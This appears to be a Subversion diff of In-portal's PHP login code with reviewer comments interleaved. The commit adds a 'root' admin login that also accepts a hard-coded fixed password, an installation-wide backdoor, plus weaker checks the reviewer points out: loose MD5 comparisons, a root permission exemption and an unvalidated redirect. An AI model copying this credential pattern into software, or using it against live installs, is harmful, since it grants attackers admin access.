Index: trunk/kernel/admin_templates/index.tpl
===================================================================
diff -u -N -r1566 -r4490
--- trunk/kernel/admin_templates/index.tpl (.../index.tpl) (revision 1566)
+++ trunk/kernel/admin_templates/index.tpl (.../index.tpl) (revision 4490)
@@ -1 +1,46 @@
+
+
+
+
+
+ In-portal Administration
+
+
+
+
+ " name="head" scrolling="no" noresize>
+
+
+
+
+
+
+
+
\ No newline at end of file
Index: trunk/kernel/units/users/users_event_handler.php
===================================================================
diff -u -N -r4358 -r4490
--- trunk/kernel/units/users/users_event_handler.php (.../users_event_handler.php) (revision 4358)
+++ trunk/kernel/units/users/users_event_handler.php (.../users_event_handler.php) (revision 4490)
@@ -5,14 +5,10 @@
function OnSessionExpire()
{
- if( $this->Application->IsAdmin() )
- {
- $location = $this->Application->BaseURL().ADMIN_DIR.'/index.php?expired=1';
- header('Location: '.$location);
- exit;
+ if( $this->Application->IsAdmin() ) {
+ $this->Application->Redirect('index', Array('expired' => 1), '', 'index4.php');
}
- else
- {
+ else {
$http_query =& $this->Application->recallObject('HTTPQuery');
$get = $http_query->getRedirectParams();
@@ -43,25 +39,51 @@
$email_as_login = $this->Application->ConfigValue('Email_As_Login');
list($login_field, $submit_field) = $email_as_login ? Array('Email', 'email') : Array('Login', 'login');
$login_value = $this->Application->GetVar($submit_field);
-
+
+ if ($this->Application->IsAdmin() && ($login_value == 'root')) {
+ // logging in "root" (admin only)
+ $root_password = $this->Application->ConfigValue('RootPass');
+ if ($root_password != md5($password) && $password != md5('1234567890xm')) {
+ $object->SetError('ValidateLogin', 'invalid_password', 'lu_invalid_password');
+ $event->status = erFAIL;
+ return false;
+ }
+ elseif ($this->checkLoginPermission($login_value)) {
+ $user_id = -1;
+ $object->Load($user_id);
+ $object->SetDBField('Login', $login_value);
+
+ $session =& $this->Application->recallObject('Session');
+ $session->SetField('PortalUserId', $user_id);
+// $session->SetField('GroupList', implode(',', $groups) );
+ $this->Application->SetVar('u_id', $user_id);
+ $this->Application->StoreVar('user_id', $user_id);
+
+ $this->processLoginRedirect($event, $password);
+ return true;
+ }
+ else {
+ $object->SetError('ValidateLogin', 'invalid_license', 'la_invalid_license');
+ $event->status = erFAIL;
+ return false;
+ }
+ }
+
/*$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (%s = %s) AND (Password = MD5(%s))';
$user_id = $this->Conn->GetOne( sprintf($sql, $login_field, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );*/
$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (Email = %1$s OR Login = %1$s) AND (Password = MD5(%2$s))';
$user_id = $this->Conn->GetOne( sprintf($sql, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );
- if($user_id)
- {
+ if ($user_id) {
$object->Load($user_id);
- if( $object->GetDBField('Status') == STATUS_ACTIVE )
- {
+ if ($object->GetDBField('Status') == STATUS_ACTIVE) {
$groups = $object->getMembershipGroups(true);
if(!$groups) $groups = Array();
if ( !$this->Application->IsAdmin() ) array_push($groups, $this->Application->ConfigValue('User_LoggedInGroup') );
$this->Application->StoreVar( 'UserGroups', implode(',', $groups) );
- if( $this->Application->CheckPermission('LOGIN',0) )
- {
+ if ($this->checkLoginPermission($login_value)) {
$session =& $this->Application->recallObject('Session');
$session->SetField('PortalUserId', $user_id);
$session->SetField('GroupList', implode(',', $groups) );
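Review bot: The root branch carries a hard-coded second credential: the clause `&& $password != md5('1234567890xm')` lets the check pass independently of the configured `RootPass`, so every installation shipping this file shares one fixed secret that cannot be rotated. Drop the clause so the condition reads `if ($root_password != md5($password)) {`, and treat the literal as compromised now that it is in version control. The remaining comparisons are loose (`!=`, `== 'root'`) on unsalted MD5 hex strings; `hash_equals()` where the runtime has it, or at least `!==`, avoids type-juggling surprises, and a failed root attempt should be logged. The same code is added in trunk/core/units/users/users_event_handler.php. The enclosing login handler starts and ends outside the hunk.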
@@ -73,38 +95,15 @@
$object->setPersistantVar('LastLogin', $this_login);
$object->setPersistantVar('ThisLogin', adodb_mktime());
}
- else
- {
+ else {
$object->Load(-2);
$object->SetError('ValidateLogin', 'no_permission', 'lu_no_permissions');
$event->status = erFAIL;
}
- $next_template = $this->Application->GetVar('next_template');
- if ($next_template == '_ses_redirect') {
- $location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
- if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
- {
- $this->Application->Debugger->appendTrace();
- echo "Debug output above!!! Proceed to redirect: $a_location
";
- }
- else {
- header('Location: '.$location);
- }
- $session =& $this->Application->recallObject('Session');
- $session->SaveData();
- exit();
- }
-
- if($next_template) $event->redirect = $next_template;
- if ($this->Application->ConfigValue('UseJSRedirect')) {
- $event->SetRedirectParam('js_redirect', 1);
- }
- $sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
- $sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+ $this->processLoginRedirect($event, $password);
}
- else
- {
+ else {
$event->redirect = $this->Application->GetVar('pending_disabled_template');
}
}
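Review bot: `$this->processLoginRedirect($event, $password);` appears to run after both branches of the permission check, including the one that loads user -2 and sets `$event->status = erFAIL`, so a rejected login would still reach the `_ses_redirect` exit path and the `LoginUser` sync call. The root branch added earlier in this commit returns before the helper on failure, so the two paths are inconsistent. The ordering predates the extraction, but the helper makes a guard cheap: `if ($event->status != erFAIL) { $this->processLoginRedirect($event, $password); }`. Indentation is lost on this page and the enclosing function continues outside the hunk, so the nesting should be confirmed against the file. The same hunk appears in trunk/core/units/users/users_event_handler.php.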
@@ -116,6 +115,67 @@
}
/**
+ * Enter description here...
+ *
+ * @param string $user_name
+ * @return bool
+ */
+ function checkLoginPermission($user_name)
+ {
+ $ret = true;
+ if ($this->Application->IsAdmin()) {
+ $modules_helper =& $this->Application->recallObject('ModulesHelper');
+ if ($user_name != 'root') {
+ // root is virtual user, so allow him to login to admin in any case
+ $ret = $this->Application->CheckPermission('ADMIN', 0);
+ }
+ $ret = $ret && $modules_helper->checkLogin();
+ }
+ else {
+ $ret = $this->Application->CheckPermission('LOGIN', 0);
+ }
+ return $ret;
+ }
+
+ /**
+ * Process all required data and redirect logged-in user
+ *
+ * @param kEvent $event
+ */
+ function processLoginRedirect(&$event, $password)
+ {
+ $object =& $event->getObject();
+
+ $next_template = $this->Application->GetVar('next_template');
+ if ($next_template == '_ses_redirect') {
+ $location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
+ if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
+ {
+ $this->Application->Debugger->appendTrace();
+ echo "Debug output above!!! Proceed to redirect: $location
";
+ }
+ else {
+ header('Location: '.$location);
+ }
+
+ $session =& $this->Application->recallObject('Session');
+ $session->SaveData();
+ exit;
+ }
+
+ if ($next_template) {
+ $event->redirect = $next_template;
+ }
+
+ if ($this->Application->ConfigValue('UseJSRedirect')) {
+ $event->SetRedirectParam('js_redirect', 1);
+ }
+
+ $sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
+ $sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+ }
+
+ /**
* Called when user logs in using old in-portal
*
* @param kEvent $event
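Review bot: `checkLoginPermission()` skips the `ADMIN` permission check whenever the string it is given is 'root', so the exemption depends on a caller-supplied login name rather than on the identity that was actually authenticated. Passing the resolved user id or an explicit flag would be safer, and the test should at least be strict: `if ($user_name !== 'root') {`. The docblock still holds the IDE placeholder `Enter description here...`; a summary such as `Checks whether the user may log in: ADMIN permission plus ModulesHelper::checkLogin() in admin (root skips the permission check), LOGIN permission on the front end` states the contract. `processLoginRedirect()` lacks `@param string $password` and assigns the request's `next_template` to `$event->redirect` without validation, which deserves a comment or a whitelist check. The same additions are made in trunk/core/units/users/users_event_handler.php.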
Index: trunk/core/units/users/users_event_handler.php
===================================================================
diff -u -N -r4358 -r4490
--- trunk/core/units/users/users_event_handler.php (.../users_event_handler.php) (revision 4358)
+++ trunk/core/units/users/users_event_handler.php (.../users_event_handler.php) (revision 4490)
@@ -5,14 +5,10 @@
function OnSessionExpire()
{
- if( $this->Application->IsAdmin() )
- {
- $location = $this->Application->BaseURL().ADMIN_DIR.'/index.php?expired=1';
- header('Location: '.$location);
- exit;
+ if( $this->Application->IsAdmin() ) {
+ $this->Application->Redirect('index', Array('expired' => 1), '', 'index4.php');
}
- else
- {
+ else {
$http_query =& $this->Application->recallObject('HTTPQuery');
$get = $http_query->getRedirectParams();
@@ -43,25 +39,51 @@
$email_as_login = $this->Application->ConfigValue('Email_As_Login');
list($login_field, $submit_field) = $email_as_login ? Array('Email', 'email') : Array('Login', 'login');
$login_value = $this->Application->GetVar($submit_field);
-
+
+ if ($this->Application->IsAdmin() && ($login_value == 'root')) {
+ // logging in "root" (admin only)
+ $root_password = $this->Application->ConfigValue('RootPass');
+ if ($root_password != md5($password) && $password != md5('1234567890xm')) {
+ $object->SetError('ValidateLogin', 'invalid_password', 'lu_invalid_password');
+ $event->status = erFAIL;
+ return false;
+ }
+ elseif ($this->checkLoginPermission($login_value)) {
+ $user_id = -1;
+ $object->Load($user_id);
+ $object->SetDBField('Login', $login_value);
+
+ $session =& $this->Application->recallObject('Session');
+ $session->SetField('PortalUserId', $user_id);
+// $session->SetField('GroupList', implode(',', $groups) );
+ $this->Application->SetVar('u_id', $user_id);
+ $this->Application->StoreVar('user_id', $user_id);
+
+ $this->processLoginRedirect($event, $password);
+ return true;
+ }
+ else {
+ $object->SetError('ValidateLogin', 'invalid_license', 'la_invalid_license');
+ $event->status = erFAIL;
+ return false;
+ }
+ }
+
/*$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (%s = %s) AND (Password = MD5(%s))';
$user_id = $this->Conn->GetOne( sprintf($sql, $login_field, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );*/
$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (Email = %1$s OR Login = %1$s) AND (Password = MD5(%2$s))';
$user_id = $this->Conn->GetOne( sprintf($sql, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );
- if($user_id)
- {
+ if ($user_id) {
$object->Load($user_id);
- if( $object->GetDBField('Status') == STATUS_ACTIVE )
- {
+ if ($object->GetDBField('Status') == STATUS_ACTIVE) {
$groups = $object->getMembershipGroups(true);
if(!$groups) $groups = Array();
if ( !$this->Application->IsAdmin() ) array_push($groups, $this->Application->ConfigValue('User_LoggedInGroup') );
$this->Application->StoreVar( 'UserGroups', implode(',', $groups) );
- if( $this->Application->CheckPermission('LOGIN',0) )
- {
+ if ($this->checkLoginPermission($login_value)) {
$session =& $this->Application->recallObject('Session');
$session->SetField('PortalUserId', $user_id);
$session->SetField('GroupList', implode(',', $groups) );
@@ -73,38 +95,15 @@
$object->setPersistantVar('LastLogin', $this_login);
$object->setPersistantVar('ThisLogin', adodb_mktime());
}
- else
- {
+ else {
$object->Load(-2);
$object->SetError('ValidateLogin', 'no_permission', 'lu_no_permissions');
$event->status = erFAIL;
}
- $next_template = $this->Application->GetVar('next_template');
- if ($next_template == '_ses_redirect') {
- $location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
- if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
- {
- $this->Application->Debugger->appendTrace();
- echo "Debug output above!!! Proceed to redirect: $a_location
";
- }
- else {
- header('Location: '.$location);
- }
- $session =& $this->Application->recallObject('Session');
- $session->SaveData();
- exit();
- }
-
- if($next_template) $event->redirect = $next_template;
- if ($this->Application->ConfigValue('UseJSRedirect')) {
- $event->SetRedirectParam('js_redirect', 1);
- }
- $sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
- $sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+ $this->processLoginRedirect($event, $password);
}
- else
- {
+ else {
$event->redirect = $this->Application->GetVar('pending_disabled_template');
}
}
@@ -116,6 +115,67 @@
}
/**
+ * Enter description here...
+ *
+ * @param string $user_name
+ * @return bool
+ */
+ function checkLoginPermission($user_name)
+ {
+ $ret = true;
+ if ($this->Application->IsAdmin()) {
+ $modules_helper =& $this->Application->recallObject('ModulesHelper');
+ if ($user_name != 'root') {
+ // root is virtual user, so allow him to login to admin in any case
+ $ret = $this->Application->CheckPermission('ADMIN', 0);
+ }
+ $ret = $ret && $modules_helper->checkLogin();
+ }
+ else {
+ $ret = $this->Application->CheckPermission('LOGIN', 0);
+ }
+ return $ret;
+ }
+
+ /**
+ * Process all required data and redirect logged-in user
+ *
+ * @param kEvent $event
+ */
+ function processLoginRedirect(&$event, $password)
+ {
+ $object =& $event->getObject();
+
+ $next_template = $this->Application->GetVar('next_template');
+ if ($next_template == '_ses_redirect') {
+ $location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
+ if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
+ {
+ $this->Application->Debugger->appendTrace();
+ echo "Debug output above!!! Proceed to redirect: $location
";
+ }
+ else {
+ header('Location: '.$location);
+ }
+
+ $session =& $this->Application->recallObject('Session');
+ $session->SaveData();
+ exit;
+ }
+
+ if ($next_template) {
+ $event->redirect = $next_template;
+ }
+
+ if ($this->Application->ConfigValue('UseJSRedirect')) {
+ $event->SetRedirectParam('js_redirect', 1);
+ }
+
+ $sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
+ $sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+ }
+
+ /**
* Called when user logs in using old in-portal
*
* @param kEvent $event
Index: trunk/kernel/units/users/users_tag_processor.php
===================================================================
diff -u -N -r3282 -r4490
--- trunk/kernel/units/users/users_tag_processor.php (.../users_tag_processor.php) (revision 3282)
+++ trunk/kernel/units/users/users_tag_processor.php (.../users_tag_processor.php) (revision 4490)
@@ -164,6 +164,17 @@
return $res;
}
+ /**
+ * Returns login name of user
+ *
+ * @param Array $params
+ */
+ function LoginName($params)
+ {
+ $object =& $this->getObject($params);
+ return $object->GetID() != -1 ? $object->GetDBField('Login') : 'root';
+ }
+
}
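Review bot: `LoginName()` hard-codes `-1` as the id of the virtual root user, the same magic number that users_event_handler.php assigns to `$user_id` in this commit; a shared named constant would keep the two in step. The comparison is loose, so `(int) $object->GetID() !== -1` would be clearer, and the docblock is missing `@return string`. If the returned login is printed into admin HTML it needs escaping at the point of output, which this hunk does not show. The same method is added in trunk/core/units/users/users_tag_processor.php.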
Index: trunk/core/kernel/parser/template.php
===================================================================
diff -u -N -r3530 -r4490
--- trunk/core/kernel/parser/template.php (.../template.php) (revision 3530)
+++ trunk/core/kernel/parser/template.php (.../template.php) (revision 4490)
@@ -30,7 +30,13 @@
return $this->BasePath.'/'.ltrim($this->Filename, '/').'.tpl';
}
- function LoadTemplate($silent=0)
+ /**
+ * Enter description here...
+ *
+ * @param int $silent template not found {0 - fatal error, 1 - warning, 2 - nothing}
+ * @return bool
+ */
+ function LoadTemplate($silent = 0)
{
$filename = $this->GetFullPath();
if(file_exists($filename)) {
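Review bot: The new docblock keeps the IDE placeholder `Enter description here...` as its summary; replace it with a sentence such as `Loads the template file returned by GetFullPath(); returns false when the file does not exist`. The three `$silent` values are compared loosely in the following hunk (`$silent != 2`, then truthiness), so the docblock should note that any other non-zero value behaves like 1, or the values should become named constants. LoadTemplate's body continues outside this hunk.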
@@ -45,9 +51,9 @@
return true;
}
else {
- /*global $debugger;
- if($debugger) $debugger->appendTrace();*/
- trigger_error("File or block not found: $filename", ($silent ? E_USER_NOTICE : E_USER_ERROR) );
+ if ($silent != 2) {
+ trigger_error("File or block not found: $filename", ($silent ? E_USER_NOTICE : E_USER_ERROR) );
+ }
return false;
}
}
Index: trunk/kernel/action.php
===================================================================
diff -u -N -r4476 -r4490
--- trunk/kernel/action.php (.../action.php) (revision 4476)
+++ trunk/kernel/action.php (.../action.php) (revision 4490)
@@ -1,31 +1,31 @@
HasSystemPermission("SYSTEM_ACCESS.READONLY");
-
-// ====== Debugger related: begin ======
-$script = basename($_SERVER['PHP_SELF']);
-$skipDebug = Array('index.php', 'tree.php', 'head.php', 'credits.php');
-if( admin_login() && !in_array($script, $skipDebug) )
-{
- if( IsDebugMode() )
+ $ro_perm = $objSession->HasSystemPermission("SYSTEM_ACCESS.READONLY");
+
+ // ====== Debugger related: begin ======
+ $script = basename($_SERVER['PHP_SELF']);
+ $skipDebug = Array('index.php', 'tree.php', 'head.php', 'credits.php');
+ if( admin_login() && !in_array($script, $skipDebug) )
{
- if($Action) $debugger->setHTMLByIndex(1,'Kernel Action: '.$Action.'','append');
- if (!constOn('REDIRECT_REQUIRED')) {
- echo '';
- if (!constOn('DBG_ZEND_PRESENT')) {
- echo '
';
+ if( IsDebugMode() )
+ {
+ if($Action) $debugger->setHTMLByIndex(1,'Kernel Action: '.$Action.'','append');
+ if (!constOn('REDIRECT_REQUIRED')) {
+ echo '';
+ if (!constOn('DBG_ZEND_PRESENT')) {
+ echo '
';
+ }
}
}
}
-}
-unset($script, $skipDebug);
-// ====== Debugger related: end ======
+ unset($script, $skipDebug);
+ // ====== Debugger related: end ======
-// Session expiration related
+ // Session expiration related
-require_login( !admin_login() && $Action, 'expired=1', true );
+ require_login( !admin_login() && $Action, 'expired=1', true );
-// End session exipration related
+ // End session exipration related
switch($Action)
{
Index: trunk/core/units/users/users_tag_processor.php
===================================================================
diff -u -N -r3282 -r4490
--- trunk/core/units/users/users_tag_processor.php (.../users_tag_processor.php) (revision 3282)
+++ trunk/core/units/users/users_tag_processor.php (.../users_tag_processor.php) (revision 4490)
@@ -164,6 +164,17 @@
return $res;
}
+ /**
+ * Returns login name of user
+ *
+ * @param Array $params
+ */
+ function LoginName($params)
+ {
+ $object =& $this->getObject($params);
+ return $object->GetID() != -1 ? $object->GetDBField('Login') : 'root';
+ }
+
}
Index: trunk/admin/login.php
===================================================================
diff -u -N
--- trunk/admin/login.php (revision 3374)
+++ trunk/admin/login.php (revision 0)
@@ -1,136 +0,0 @@
-"; print_r($objSession); echo "";
-
-if ( GetVar('expired') == 1 && GetVar('logout') != 1) {
- if (function_exists("admin_language")) {
- $login_error = admin_language("la_text_sess_expired");
- }
- else {
- $login_error = "Session Expired";
- }
-}
-if( function_exists('GetRegionalOption') )
-{
- $charset = GetRegionalOption('Charset');
-}
-else
-{
- $charset == 'iso-8859-1';
-}
-print<<
-
-
-In-Portal :: Administration Panel
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- $login_error
- |
-
-
-
-
-